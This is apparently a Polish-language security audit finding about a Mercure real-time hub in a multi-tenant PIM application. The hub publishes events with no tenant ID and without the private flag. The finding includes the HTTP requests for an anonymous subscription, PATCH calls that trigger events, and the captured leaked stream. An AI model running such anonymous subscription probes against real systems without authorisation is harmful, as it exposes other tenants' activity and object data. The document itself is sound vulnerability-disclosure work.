==========================================================
MERCURE CROSS-TENANT LEAK (A-01) — 2026-06-16T19:38:56Z
==========================================================

### ANALIZA KODU (apps/api/src/Catalog/Application/Subscriber/MercurePublisher.php) ###
- TOPIC_PREFIX_OBJECT = 'objects'; topicBase = MERCURE_TOPIC_BASE = https://pim.localhost
- Topiki publikacji: 'https://pim.localhost/objects/{objectId}' + broadcast 'https://pim.localhost/objects'
- BRAK tenant_id w topiku.
- new Update(topics, data) tworzone BEZ flagi private:true => event PUBLICZNY (anonim moze subskrybowac).
- payload: {objectId, changedAttributeCodes / enabled / ...} — ujawnia ID obiektu i zmiany cudzego tenanta.

### KROK 1: anonimowa subskrypcja (BEZ tokena) — naglowki ###
GET /.well-known/mercure?topic=https://pim.localhost/objects (bez Authorization)
  -> HTTP 200, content-type: text/event-stream  (hub przyjal anonima na topic publiczny)

### KROK 2: demo generuje event domenowy (PATCH enabled toggle na RPT-1) ###
  PATCH /api/products/019ecbf1-13df-7b13-8f6c-1d7e94df5459 {enabled:false} -> HTTP 200
  PATCH /api/products/019ecbf1-13df-7b13-8f6c-1d7e94df5459 {enabled:true}  -> HTTP 200 (stan przywrocony)

### KROK 3: ANONIMOWY ODBIOR (mercure-stream.txt) — DOWOD WYCIEKU ###
:
id: urn:uuid:019ed1f1-1d33-7483-8d4c-ba4d3e060839
data: {"type":"object.enabled_changed","occurredOn":"2026-06-16T19:38:20.217+00:00","data":{"objectId":"019ecbf1-13df-7b13-8f6c-1d7e94df5459","enabled":false}}

id: urn:uuid:019ed1f1-25b5-7483-b51a-326286dd2fbd
data: {"type":"object.enabled_changed","occurredOn":"2026-06-16T19:38:22.504+00:00","data":{"objectId":"019ecbf1-13df-7b13-8f6c-1d7e94df5459","enabled":true}}


### WERDYKT: A-01 POTWIERDZONE ###
Anonimowy klient bez tokena i bez tozsamosci tenanta odebral 2 eventy domenowe tenanta demo
(object.enabled_changed z objectId obiektu demo). Topic 'objects' jest wspoldzielony przez
wszystkie tenanty (brak tenant_id w topiku) i publiczny (brak private:true). Kazdy tenant B
nasluchujacy ten topic odbiera eventy tenanta A => CROSS-TENANT REALTIME LEAK + brak autoryzacji subskrypcji.
Severity: CRITICAL (info disclosure: aktywnosc, ID obiektow, kody zmienianych atrybutow innych tenantow).

### CLEANUP: brak — uzyto PATCH na istniejacym obiekcie demo z przywroceniem stanu (enabled=true).
             NIE utworzono AUDIT-PROBE-MERCURE (czystsze niz POST+DELETE).
